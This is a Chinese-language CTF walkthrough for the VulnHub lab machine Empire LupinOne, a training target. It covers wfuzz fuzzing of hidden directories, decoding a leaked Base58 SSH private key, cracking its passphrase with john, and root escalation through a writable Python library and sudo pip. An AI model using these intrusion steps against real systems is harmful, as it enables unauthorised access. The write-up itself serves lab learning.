VULNHUB靶机 Empire LupinOne

作者: doinb1517 | 来源:发表于2022-05-30 17:15 被阅读0次

VULNHUB靶机 Empire LupinOne
Vulnhub靶机：DC-9
CTF-DC8靶机攻防
VulnHub学习：InfoSecWarrior CTF 202
CTF-DC9靶机攻防
Vulnhub:hackeme2
Vulnhub:djinn
Vulnhub:djinn: 2
Vulnhub:djinn:3
JIS-CTF-VulnUpload

简介

Difficulty: Medium

This box was created to be medium, but it can be hard if you get lost.

CTF like box. You have to enumerate as much as you can.

For hints discord Server ( https://discord.gg/7asvAhCEhe )

链接：https://www.vulnhub.com/entry/empire-lupinone,750/

知识点

wfuzz工具使用
ssh私钥泄露利用
john使用
sudo提权

Writeup

Active Scanning

扫描端口

nmap -sV -p- 192.168.204.135

nmap-p.png

直接访问80端口

发现只有一张图片

80image.png

F12查看源码

f12.png

可以看到存在一个/image目录的。

尝试访问，可能存在文件上传漏洞。

images.png

常规流程扫描目录

dirb.png

基本没有找到有价值的目录。

查看robots.txt目录，发现禁止访问/~myfiles目录

robots.png

fuzz目录

wfuzz -z file,/usr/share/wordlists/wfuzz/general/big.txt --hc 404,403 http://192.168.204.135/\~FUZZ

发现目录/~secret，访问此目录，发现文件暗示存在ssh密钥。

fuzz.png

my_secret.png

尝试寻找密钥文件，这里可以使用多个字典，如果是第2个字典就将FUZZ变成FUZ2Z

wfuzz -z file,/usr/share/dirb/wordlists/extensions_common.txt -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,403 http://192.168.204.135/~secret/.FUZ2ZFUZZ

Initial Access

发现文件.mysecret.txt，访问文件

mysecret.png

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

发现疑似是base64解码，解码后发现是乱码，使用Base家族其他几个算法如Base62，Base58

Base32是不区分大小写的

Base16全是数字

发现是Base58编码的，进行解码，发现是ssh密钥泄露问题

尝试使用私钥ssh登陆

ssh icex64@192.168.204.135 -i key

key_need_pw.png

发现没权限，给777权限后发现给高了，正确应该给私钥文件600权限，发现需要密码才可以使用这个私钥文件。

ssh_need_pw2.png

使用ssh2john转换文件，并使用john爆破,得到密码P@55w0rd!

python ssh2john.py key > keyhash
john keyhash --wordlist=/usr/share/wordlists/fasttrack.txt
# 注意join爆破成功后第二次运行会产生如下输出
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)

可以使用以下命令查看
john --show keyhash
P@55w0rd!

get_ssh_pw.png

得到第一个flag

3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}

Privilege Escalation

查看其他用户，发现新用户arsene

[图片上传中...(arsene.png-d81c38-1653987228974-0)]

尝试提权sudo -l

01.png

发现文件/home/arsene/heist.py

查看文件，发现导入了webbrowser文件，去/usr/lib/python3.9找对应文件，发现有写权限。

import webbrowser
print ("Its not yet ready to get in action")

python3.png

获取shell

shell1.png

运行/home/arsene/heist.py文件，获得arsene权限

icex64@LupinOne:/usr/lib/python3.9$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/usr/lib/python3.9$

继续sudo -l

sudo0l.png

在GTFOBins搜索pip提权相关命令

Link：https://gtfobins.github.io/

gtfo.png

输入以下命令进行提权

sudo2.png

提权到root

root.png

VULNHUB靶机 Empire LupinOne
简介 Difficulty: Medium This box was created to be medium, ...
Vulnhub靶机：DC-9
靶机下载地址：https://download.vulnhub.com/dc/DC-9.zip 靶机描述：DC-9...
CTF-DC8靶机攻防
靶机下载地址 https://www.vulnhub.com/entry/dc-8,367/ 靶机描述 DC-8 ...
VulnHub学习：InfoSecWarrior CTF 202
前言本次靶机学习的要点：发现奇怪点、提权靶机地址：https://www.vulnhub.com/entry/...
CTF-DC9靶机攻防
DC9靶机下载地址 https://www.vulnhub.com/entry/dc-9,412/ 靶机描述 De...
Vulnhub:hackeme2
一、前言通过大量vulnhub受控靶机积累一线攻防经验和技巧。二、环境靶机名称：hackeme2 靶机难度：...
Vulnhub:djinn
一、前言通过大量vulnhub受控靶机积累一线攻防经验和技巧。二、环境靶机名称：djinn[https://...
Vulnhub:djinn: 2
一、前言通过大量vulnhub受控靶机积累一线攻防经验和技巧。二、环境靶机名称：djinn[https://...
Vulnhub:djinn:3
一、前言通过大量vulnhub受控靶机积累一线攻防经验和技巧。二、环境靶机名称：djinn[https://...
JIS-CTF-VulnUpload
下载地址：靶机JIS-CTF（下载地址：https://download.vulnhub.com/jisctf/...